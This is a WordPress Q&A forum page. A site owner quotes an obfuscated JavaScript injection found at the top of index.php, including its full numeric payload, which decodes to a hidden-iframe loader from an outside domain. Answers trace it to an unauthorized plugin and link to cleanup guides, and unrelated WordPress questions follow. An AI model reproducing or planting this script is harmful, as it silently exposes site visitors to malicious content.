js at beginning of my index.php in wordpress - wordpress
I got a headers error and while investigating I found this at the beginning of my index.php both in the root index and in wp-admin. Clam-AV scan found no viruses.
<script>if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';f+='Code';}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[/* lots of numbers here, moved below for security */];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f](-h*(1+n[j]));}q=ss;e(q);</script>
The numbers:
3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,48,55.5,49,52,56,54.5,54.5,58,22,25,55,57.5,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,3.5,3.5,61.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5,50,56,47.5,53.5,49.5,56,19,19.5,60.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5,51,57,57,55,28,22.5,22.5,48,55.5,49,52,56,54.5,54.5,58,22,25,55,57.5,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,19.5,28.5,50,22,56.5,57,59.5,53,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5,57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53,49,19,50,19.5,28.5,3.5,3.5,61.5
EDIT: I've commented out the javascript since it was triggering my Eset AV: JS/Iframe.BQ trojan.
I had the Exact same things. Turns out there was a new plugin installed that I did not install. wp-content/plugins/ToolsPack/ToolsPack.php
Make sure you do a clean install of WP and re-install all the plugins you were using minus this one. :) Bad stuff.
You got hacked. Clam AV doesn't scan your web hosting account nor your localhost server, if you are using one. Check your site with http://sitecheck.sucuri.net/scanner/
See FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex. Tell your web host. Change all passswords.
Related
WordPress website's index.php show unusual code
I was cleaning my hacked WordPress website and I found unusual code in index.php. Is this the code used to hack my website? Or does it come from a plugin?
Your site is hacked. I would use wp migrate DB to make a copy of the database, reinstall a fresh version of wordpress and all your plugins.
How to remove or blog prefix in Wordpress
I've run my WordPress website for a long time, and recently got hacked. I cleaned everything I could find and started new. In Wordfence logs I found that someone tried to log in from blog.mywebsite.pl. I figured out that is from my webp. I realized that "blog." prefix is created automatically after wp installation. This "blog." prefix runs as http, so I could get hacked from there. I want to harden my WordPress so I need to know how to block this. I Googled the issue, but couldn't find any answers. Can someone provide info/links on how to block or remove this blog prefix in my domain/website name?
Wordpress update to 4.7 causes Magento/Fishpig integration to redirect base URL to the Wordpress folder
I've copied a live site to a test server to test updating Wordpress on a Magento site that uses Fishpig to bridge content from Wordpress to Magento. Since the udpate, the site always redirects from the homepage to the wordpress folder. e.g. dev.site.com goes to dev.site.com/wordpress. It's not an .htaccess issues, if I wipe them out in both directories it still does it, if I rename index.php in the wordpress folder it stops it but breaks the preview. If I rename the theme and plugins folders it still redirects, something in the core is causing it but I am having issues figuring out what it is. Thanks. Also if I change the site to show the latest blog post instead of the static home page, it doesn't redirect but shows the blog page.
We will need more information to help solve your problem. Are your FishPig extensions at the latest version? What FishPig add-on extensions, if any, are you using? Have you tried disabling all WordPress plugins? Do you have any error messages in System > Configuration > WordPress? My guess is that your WordPress URLs aren't setup correctly and you're using an out dated add-on extension (eg. Visual Composer). There was a bug in older versions of some add-ons that caused this issue, but this has now been fixed. If you can provide the actual link to your dev site, it will make debugging the issue much easier.
WordPress images and pages broken after host migration
I have created a WordPress site (my first) but since moving the site to a new domain all the images and pages/posts are broken and return a 404 error. Ive ran search and replace but it doesn't seem to have worked. www.phoenixworldwideent.com
Manual website migration is very difficult to do. So you can transfer your website in few minutes without any issues using duplicator plugin. you just need to installed the plugin and followed the installation wizard. you can read or watch step by step video tutorial HOW TO CLONE WEBSITE TO NEW HOST USING WORDPRESS DUPLICATOR
Go to your dashboard, log in, go to settings. Change the following: Site Address Wordpress Address Save. That should work.
did you try save permalinks some times the problem happen because permalinks need update other point if you can go to old site and use this plugin to move your site agin https://wordpress.org/plugins/duplicator/
It turns out there were some issues with the httpd.conf file and httpaccess files. The permalinks and database details were correct. I got this outsourced in the end so not 100% sure what the issue was but I shall update this post with more info when I get it :)
Website Redirects but I did not allow it
I've setup a website using WordPress and just noticed that the homepage redirects to a different section of the website with random characters. Like www.yourdomain.com redirects to www.yourdomain.com/XYiOEL which is a 404. It changes, sometimes it is there, sometimes it is not. I've checked my .htaccess (newbie here) and I don't see anything that could cause this. Help?
See FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex and tell your host. Change all passswords. Scan your own PC. And see http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html